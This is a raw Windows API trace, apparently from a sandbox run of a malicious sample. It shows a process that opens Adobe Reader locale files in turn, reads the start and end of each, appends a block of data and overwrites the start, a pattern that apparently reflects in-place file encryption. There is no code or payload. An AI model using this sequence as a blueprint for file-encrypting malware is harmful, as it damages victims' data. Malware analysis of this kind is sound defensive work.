WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RdLang32.CZE", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RdLang32.CZE", lpUsedDefaultChar=0x0) returned 12 [0071.603] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0071.611] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.613] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x144000 [0071.613] ReadFile (in: hFile=0x1dc, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.617] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x144000 [0071.618] WriteFile (in: hFile=0x1dc, lpBuffer=0x2865a58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a58*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.618] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.618] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0071.619] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.619] CloseHandle (hObject=0x1dc) returned 1 [0071.619] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Spelling.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\spelling.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.623] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.623] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2800 [0071.623] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.623] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.623] ReleaseMutex (hMutex=0x168) returned 1 [0071.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CZE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.623] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.CZE", cchWideChar=12, lpMultiByteStr=0x1f7328c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.CZE", lpUsedDefaultChar=0x0) returned 12 [0071.623] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.625] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1800 [0071.625] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.626] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1800 [0071.626] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.626] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.626] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.627] CloseHandle (hObject=0x1ec) returned 1 [0071.627] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Checkers.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\checkers.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.628] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.628] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x1de00 [0071.628] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.629] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.629] ReleaseMutex (hMutex=0x168) returned 1 [0071.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.DAN", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.629] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Checkers.DAN", cchWideChar=12, lpMultiByteStr=0x1f735ec, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Checkers.DAN", lpUsedDefaultChar=0x0) returned 12 [0071.629] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0071.631] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1ce00 [0071.631] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0071.632] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1ce00 [0071.633] WriteFile (in: hFile=0x1ec, lpBuffer=0x25aa1a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25aa1a8*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.634] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0071.634] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.634] CloseHandle (hObject=0x1ec) returned 1 [0071.635] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\pddom.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\pddom.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.636] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.636] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x2c00 [0071.636] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0071.636] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.636] ReleaseMutex (hMutex=0x168) returned 1 [0071.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.DAN", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0071.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pddom.DAN", cchWideChar=9, lpMultiByteStr=0x1f7328c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pddom.DAN", lpUsedDefaultChar=0x0) returned 9 [0071.637] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.082] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0072.087] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.100] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x1c00 [0072.113] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.114] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0072.114] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.114] CloseHandle (hObject=0x1ec) returned 1 [0072.114] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\DEXShare.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\dexshare.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.630] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.630] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x8ca7 [0072.630] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.630] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.630] ReleaseMutex (hMutex=0x168) returned 1 [0072.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.630] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DEXShare.asfx", cchWideChar=13, lpMultiByteStr=0x1f7328c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DEXShare.asfx", lpUsedDefaultChar=0x0) returned 13 [0072.630] ReadFile (in: hFile=0x1dc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0072.633] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7ca7 [0072.633] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.633] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7ca7 [0072.634] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.634] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0072.634] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.635] CloseHandle (hObject=0x1dc) returned 1 [0072.635] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Annots.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\annots.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.636] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.636] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x80a00 [0072.636] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.636] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.636] ReleaseMutex (hMutex=0x168) returned 1 [0072.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.DEU", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0072.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Annots.DEU", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Annots.DEU", lpUsedDefaultChar=0x0) returned 10 [0072.637] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0xf000, lpOverlapped=0x0) returned 1 [0072.640] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.641] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7fa00 [0072.641] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.644] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x7fa00 [0072.645] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.645] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0072.645] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0xf000, lpOverlapped=0x0) returned 1 [0072.645] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2fdf28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.646] CloseHandle (hObject=0x1dc) returned 1 [0072.646] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\makeaccessible.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\makeaccessible.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.646] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.647] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x14400 [0072.647] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.647] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.647] ReleaseMutex (hMutex=0x168) returned 1 [0072.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.DEU", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0072.647] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="makeaccessible.DEU", cchWideChar=18, lpMultiByteStr=0x1f88d34, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="makeaccessible.DEU", lpUsedDefaultChar=0x0) returned 18 [0072.648] ReadFile (in: hFile=0x1dc, lpBuffer=0x2666a38, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesRead=0x2fdf278*=0x4000, lpOverlapped=0x0) returned 1 [0072.649] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x13400 [0072.650] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.650] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x13400 [0072.651] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.651] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf2bc*=0) returned 0x0 [0072.651] WriteFile (in: hFile=0x1dc, lpBuffer=0x2666a38*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2fdf28c, lpOverlapped=0x0 | out: lpBuffer=0x2666a38*, lpNumberOfBytesWritten=0x2fdf28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.651] CloseHandle (hObject=0x1dc) returned 1 [0072.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\Search.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\de_de\\search.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.652] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.652] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x6200 [0072.652] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2fdf8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2fdf8c0*=0) returned 0x0 [0072.653] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.653] ReleaseMutex (hMutex=0x168) returned 1 [0072.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.DEU", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0072.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Search.DEU", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Search.DEU", lpUsedDefaultChar=0x0) returned 10 [0072.653] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.655] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2fdf2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2fdf2e8*=0) returned 0x5200 [0072.655] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2fdf278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2fdf278*=0x1000, lpOverlapped=0x0) returned 1 [0072.655] SetFilePointer (in: hFile=0x1dc, 